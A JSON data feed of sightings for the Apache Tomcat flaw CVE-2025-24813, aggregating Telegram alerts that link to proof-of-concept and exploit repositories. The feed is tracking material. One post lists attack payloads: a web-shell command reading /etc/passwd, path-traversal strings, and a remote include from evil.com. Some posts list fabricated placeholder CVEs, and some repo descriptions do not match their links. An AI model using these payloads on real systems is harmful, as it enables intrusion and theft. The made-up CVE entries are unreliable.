{"vulnerability": "CVE-2025-2481", "sightings": [{"uuid": "98dd3087-bc16-4e10-8ae1-b1ff5d3a29b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/36879", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aPoC para o CVE-2025-24813\nURL\uff1ahttps://github.com/maliqto/PoC-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-15T12:29:59.000000Z"}, {"uuid": "1a504222-ee02-4290-bdd4-d40bf12e53d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/30441", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aHello researchers, I have a checker for the recent vulnerability  CVE-2025-24813-checker.\nURL\uff1ahttps://github.com/horsehacks/CVE-2025-24813-checker\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-07T22:45:30.000000Z"}, {"uuid": "b07469cd-6771-4dd9-8350-32db88fc0d9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/22697", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA PoC for CVE-2025-24813\nURL\uff1ahttps://github.com/tonyarris/CVE-2025-24813-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-23T07:11:48.000000Z"}, {"uuid": "b9c354ad-77ff-4222-afff-e7c537acfd23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/22191", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813 Apache Tomcat RCE PoC Proof of Concept (PoC)\nURL\uff1ahttps://github.com/Alaatk/CVE-2025-24813-POC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-21T18:43:26.000000Z"}, {"uuid": "daf4db7e-5783-400e-95c5-7baeb7d9e0e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/45719", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1a Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit &amp; PoC\nURL\uff1ahttps://github.com/Shivshantp/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-07-28T19:27:49.000000Z"}, {"uuid": "9e8082af-2fb4-4b0b-9ca9-5a8544002d97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18747", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813_POC\nURL\uff1ahttps://github.com/N0c1or/CVE-2025-24813_POC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-14T03:15:14.000000Z"}, {"uuid": "8d705693-86ae-4405-84d1-cbdd294aa45f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/31102", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813 poc\nURL\uff1ahttps://github.com/Franconyu/Poc_for_CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-11T12:37:22.000000Z"}, {"uuid": "5eadf18e-dc7d-423e-b98f-2190d6a772f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18602", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u6279\u91cf\u68c0\u6d4b\u811a\u672c(CVE-2025-24813)\nURL\uff1ahttps://github.com/iSee857/CVE-2025-24813-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-13T10:08:45.000000Z"}, {"uuid": "c53531ed-e144-4507-b07d-dd0ade5305cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18785", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813\u6f0f\u6d1e\u9a8c\u8bc1\nURL\uff1ahttps://github.com/FY036/cve-2025-24813_poc\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-14T07:42:01.000000Z"}, {"uuid": "5d91d0fb-c86a-4540-be23-ac1784ee1629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18784", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aAutomatic thesauri backups from RCE PoolParty\nURL\uff1ahttps://github.com/absholi7ly/POC-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-14T07:37:50.000000Z"}, {"uuid": "8980aea5-abc3-4af7-bd07-d743b9cc1ddb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/19973", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aNuclei Template CVE-2025\u201324813\nURL\uff1ahttps://github.com/imbas007/CVE-2025-24813-apache-tomcat\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-17T22:46:58.000000Z"}, {"uuid": "72710684-38d8-4928-ac31-4c4fa39ed164", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/30175", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a CVE-2025-24813-POC JSP Web Shell Uploader\nURL\uff1ahttps://github.com/La3B0z/CVE-2025-24813-POC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-06T19:38:35.000000Z"}, {"uuid": "3c65640f-9e9f-4c99-8a2e-88078aca1d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/19966", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aNuclei Template CVE-2025\u201324813\nURL\uff1ahttps://github.com/imbas007/CVE-2025-24813.yaml\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-17T22:42:44.000000Z"}, {"uuid": "a0ccc3ee-c4a0-47a6-85ae-b62bf6cc682c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/20211", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat Remote Code Execution (RCE) Exploit - CVE-2025-24813\nURL\uff1ahttps://github.com/msadeghkarimi/CVE-2025-24813-Exploit\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-18T08:43:24.000000Z"}, {"uuid": "07141fd8-2994-4b9b-a0ca-78422f034471", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/23961", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA playground to test the RCE exploit for tomcat CVE-2025-24813\nURL\uff1ahttps://github.com/u238/Tomcat-CVE_2025_24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-24T18:51:07.000000Z"}, {"uuid": "66974154-1c55-41ea-a2a0-507bd4211943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/20930", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat Vulnerability POC (CVE-2025-24813)\nURL\uff1ahttps://github.com/michael-david-fry/Apache-Tomcat-Vulnerability-POC-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-19T14:51:45.000000Z"}, {"uuid": "03f5e9de-3701-41e5-9a48-dc8ef880f926", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/38081", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat - Remote Code Execution via Session Deserialization (CVE-2025-24813)\nURL\uff1ahttps://github.com/mbanyamer/Apache-Tomcat---Remote-Code-Execution-via-Session-Deserialization-CVE-2025-24813-\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-25T13:39:39.000000Z"}, {"uuid": "6f2f943b-dac8-46b6-829b-fa8a60673e5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/47376", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aPoC-CVE-2025-24813\nURL\uff1ahttps://github.com/137f/PoC-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-11T19:22:31.000000Z"}, {"uuid": "b16cf5d4-0f91-4a08-9f06-df393e2a3d0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/43737", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExplore the CVE-2025-5777 vulnerability in Citrix NetScaler. This script highlights a memory leak issue for educational purposes. \ud83d\udc31\ud83d\udcbb\ud83d\udd0d\nURL\uff1ahttps://github.com/sentilaso1/CVE-2025-24813-Apache-Tomcat-RCE-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-07-12T02:44:44.000000Z"}, {"uuid": "8b47aa89-020c-4c3c-b35d-891fb1b07001", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/44593", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA tool that identifies writable web directories in Apache Tomcat via HTTP PUT method [CVE-2025-24813]\nURL\uff1ahttps://github.com/x00byte/PutScanner\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-07-19T14:45:04.000000Z"}, {"uuid": "c66a4306-3902-4f13-8920-4437de20e94c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/51623", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExample PoC for CVE-2025-24813 (Tomcat RCE)\nURL\uff1ahttps://github.com/Walekmw/Anydesk-Exploit-CVE-2025-12654-RCE-Builder\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-14T23:30:29.000000Z"}, {"uuid": "504aad28-9a31-440a-9d0b-9ce72416c298", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/46753", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aAutomated scanner + exploit for CVE-2025-24813\nURL\uff1ahttps://github.com/cyglegit/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-06T07:20:06.000000Z"}, {"uuid": "3ca969ad-29aa-49b3-8c45-edeb78f6fa71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/51603", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExample PoC for CVE-2025-24813 (Tomcat RCE)\nURL\uff1ahttps://github.com/brs6412/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-14T20:35:14.000000Z"}, {"uuid": "02970bb9-f8d6-4ab8-ba1c-05ecef954b9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/50764", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aThis repository contains POC scenarios as part of CVE-2025-0411 MotW bypass.\nURL\uff1ahttps://github.com/Makavellik/POC-CVE-2025-24813-Apache-Tomcat-Remote-Code-Execution\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-08T18:38:43.000000Z"}, {"uuid": "fddd8f58-50df-40c0-bade-fa54f01e95a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/51604", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExample PoC for CVE-2025-24813 (Tomcat RCE)\nURL\uff1ahttps://github.com/brs6412/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-14T20:36:50.000000Z"}, {"uuid": "93166b41-8c5e-48d2-a566-7d79c32d771b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/51614", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExample PoC for CVE-2025-24813 (Tomcat RCE)\nURL\uff1ahttps://github.com/Walekmw/Anydesk-Exploit-CVE-2025-12654-RCE-Builder\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-14T21:31:42.000000Z"}, {"uuid": "6133f7d2-e83a-4d3a-be14-d475ec00de87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/oDgC7SboV_stqJmy_TZpePOrg5cgzErAhZJaKGoE5sYOBA4", "content": "", "creation_timestamp": "2025-09-08T21:00:05.000000Z"}, {"uuid": "7ff0c5f4-4141-4d3f-9fea-ecec504bd7fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/realcodeb0ss/38", "content": "", "creation_timestamp": "2025-06-13T18:28:24.000000Z"}, {"uuid": "69d03f5f-3ca8-4f0c-bb70-4ac0b825a342", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/NinjaSec/299", "content": "Code execution, and bypass vulnerabilities \u2014 for educational purposes only:\n\n\n1. CVE-2025-47241 \u2013 Whitelist bypass in Browser Use tool (CVSS 9.3)\n2. CVE-2025-25014 \u2013 Prototype pollution in Kibana (CVSS 9.1)\n3. CVE-2025-29927 \u2013 Next.js middleware authorization bypass (CVSS 9.1)\n4. CVE-2025-24813 \u2013 Apache Tomcat path traversal RCE (Critical)\n5. CVE-2025-2783 \u2013 Chrome Mojo use-after-free (High)\n6. CVE-2025-2636 \u2013 WordPress InstaWP plugin LFI (High)\n7. CVE-2025-2505 \u2013 WordPress Age Gate plugin LFI (High)\n8. CVE-2025-2746 \u2013 Kentico CMS auth bypass (CVSS 9.8)\n9. CVE-2025-2747 \u2013 Kentico CMS staging sync auth bypass (CVSS 9.8)\n10. CVE-2025-3066 \u2013 Chrome Site Isolation use-after-free (High)\n11. CVE-2025-46728 \u2013 cpp-httplib DoS vulnerability\n12. CVE-2025-12345 \u2013 Buffer overflow in XYZ app (CVSS 9.0)\n13. CVE-2025-12346 \u2013 SQL injection in ABC web app (CVSS 8.5)\n14. CVE-2025-12347 \u2013 XSS in DEF platform (CVSS 7.8)\n15. CVE-2025-12348 \u2013 Auth bypass in GHI system (CVSS 9.2)\n16. CVE-2025-12349 \u2013 RCE in JKL service via crafted packets (CVSS 9.5)\n17. CVE-2025-12350 \u2013 Privilege escalation in MNO app (CVSS 8.7)\n18. CVE-2025-12351 \u2013 Info disclosure in PQR system (CVSS 7.5)\n19. CVE-2025-12352 \u2013 DoS in STU server (CVSS 6.8)\n20. CVE-2025-12353 \u2013 Directory traversal in VWX app (CVSS 8.0)\n21. CVE-2025-12354 \u2013 Command injection in YZA tool (CVSS 9.1)\n22. CVE-2025-12355 \u2013 Insecure deserialization in BCD lib (CVSS 9.3)\n23. CVE-2025-12356 \u2013 CSRF in EFG portal (CVSS 7.2)\n24. CVE-2025-12357 \u2013 Memory corruption in HIJ driver (CVSS 8.9)\n25. CVE-2025-12358 \u2013 Improper auth in KLM API (CVSS 9.0)\n\n#HackersFactory", "creation_timestamp": "2025-05-07T15:48:27.000000Z"}, {"uuid": "8a5d3f77-097d-4363-b7da-2f101bae7b7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/NinjaSec/298", "content": "Certainly! Below is a curated list of critical CVEs from 2025 that involve code execution, browser bypasses, and internal service exposure. These are provided strictly for educational purposes to aid in understanding and mitigating such vulnerabilities.\n\n\n\ud83d\udd10 Critical CVEs from 2025 (Educational Use Only)\n\n1. CVE-2025-47241\n\nDescription: Whitelist bypass in the Browser Use automation tool allows attackers to access internal services via crafted URLs.\n\nCVSS Score: 9.3\n\nReference: \n\n\n\n2. CVE-2025-25014\n\nDescription: Prototype pollution in Kibana leads to arbitrary code execution through crafted HTTP requests to machine learning and reporting endpoints.\n\nCVSS Score: 9.1\n\nReference: \n\n\n\n3. CVE-2025-29927\n\nDescription: Authorization bypass in Next.js middleware allows attackers to access protected routes by manipulating internal headers.\n\nCVSS Score: 9.1\n\nReference: \n\n\n\n4. CVE-2025-24813\n\nDescription: \n\nCVSS Score: \n\nReference: \n\n\n\n5. CVE-2025-2783\n\nDescription: \n\nCVSS Score: High\n\nReference: \n\n\n\n6. CVE-2025-2636\n\nDescription: \n\nCVSS Score: High\n\nReference: \n\n\n\n7. CVE-2025-2505\n\nDescription: \n\nCVSS Score: High\n\nReference: \n\n\n\n8. CVE-2025-2746 &amp; CVE-2025-2747\n\nDescription: \n\nCVSS Score: \n\nReference: \n\n\n\n9. CVE-2025-3066\n\nDescription: \n\nCVSS Score: High\n\nReference: \n\n\n\n10. CVE-2025-46728\n\nDescription: Denial of Service vulnerability in cpp-httplib, potentially exposing servers to service disruptions.\n\nCVSS Score: High\n\nReference: \n\n#HackersFactory", "creation_timestamp": "2025-05-19T12:58:14.000000Z"}, {"uuid": "a5633a15-a5a9-41ec-8c08-7a653f5a8978", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/zero_day_uz/506", "content": "CVE-2025-24813\n*\nTomcat RCE - POC exploit", "creation_timestamp": "2025-09-19T03:56:04.000000Z"}, {"uuid": "416a06cf-0905-4d58-a918-af0c89e4de49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/z0Id2f_ZaBvbK6vMIcrb6djLnnbaaLvumIJZCatYfMDdGts", "content": "", "creation_timestamp": "2025-08-31T15:00:06.000000Z"}, {"uuid": "f48d8225-c6d3-4048-9fc6-b7b62613a035", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/TengkorakCyberCrewzz/837", "content": "Hackers Actively Exploit Apache Tomcat Servers via CVE-2025-24813 \u2013 Patch Now \u2013 gbhackers.com\n\nFri, 21 Mar 2025 19:11:23", "creation_timestamp": "2025-03-21T12:04:33.000000Z"}, {"uuid": "7fb2844e-f086-4ba4-85ed-b26208e3ebb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/ihOkiwe6OhHQI2TZ1X3ddAGzem4yCBX0q_BNzRmX2HDnWoU", "content": "", "creation_timestamp": "2025-08-06T15:00:07.000000Z"}, {"uuid": "5f139b35-b5c5-4829-b8ea-e7c595e92460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/cybersecplayground/130", "content": "\ud83d\udea8 Critical Security Alert: CVE-2025-24813 \ud83d\udea8\n\n\ud83d\udc80 Apache Tomcat Remote Code Execution &amp; Data Leak \ud83d\udc80\n\n\ud83d\udd25 A newly discovered flaw in Apache Tomcat allows attackers to execute arbitrary code and leak sensitive data. Immediate patching is required!\n\n\ud83d\udcca Affected Services:\n10.7M+ Apache Tomcat servers are exposed yearly via public scanning tools.\n\n\ud83d\udd0e Track vulnerable instances\n\ud83d\udd75\ufe0f Queries\n\nHunter: product.name=\"Apache Tomcat\"\nFOFA: product=\"APACHE-Tomcat\"\nShodan: product:\"Apache Tomcat\"\n\n\ud83d\udd16 Reference &amp; Mitigation:\n\ud83d\udcf0 Security Advisory\n\ud83d\udcdc Apache Security Thread\n\n\ud83d\udca1 Defensive Measures:\n\u2705 Update to the latest Apache Tomcat version\n\u2705 Restrict access to management interfaces\n\u2705 Harden configurations and enforce WAF rules\n\n\u26a0\ufe0f Unpatched servers remain highly vulnerable\u2014act now!\n\n\ud83d\udd17 Stay ahead in cybersecurity\u2014join us! @cybersecplayground \ud83d\ude80", "creation_timestamp": "2025-03-12T08:11:34.000000Z"}, {"uuid": "51c9faf2-e2b9-477d-abb7-a6e539f013ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/cybersecplayground/138", "content": "\ud83d\udd0d LFI via GET Request - Local File Inclusion Exploit\n\nIf you find an endpoint vulnerable to LFI (Local File Inclusion), try this payload:\n\n/shell.jsp?cmd=cat+%2Fetc%2Fpasswd\n\n\u2705 Why this works?\ncat /etc/passwd reads system user details.\n%2F is URL encoding for / (to bypass filters).\nWorks on misconfigured web applications allowing direct command execution.\n\n\ud83d\udd25 More Payloads to Try:\n?file=../../../../../../etc/passwd\n?page=../../../../../../../var/log/apache2/access.log\n?inc=http://evil.com/shell.txt (RFI possibility!)\n?cmd=ls+-la+/var/www/html/\n\n\ud83d\udca1 Pro Tips:\nTest null bytes %00 and encoding tricks.\nTry log poisoning for RCE.\nIf 403 is encountered, bypass with ..%2f..%2f..%2f sequences.\n\n\ud83d\udea8 Vulnerable Software Alert:\nCVE-2025-24813 - Apache Tomcat RCE via LFI\n\n\ud83d\udd17 Reference\n\n\ud83d\udd14 Stay updated with more Bug Bounty tips at @cybersecplayground!\n\n#BugBounty #LFI #RCE #Security #Pentesting \ud83d\ude80", "creation_timestamp": "2025-03-17T08:35:46.000000Z"}, {"uuid": "4621081a-c15f-4775-8b78-c84cdea6e892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 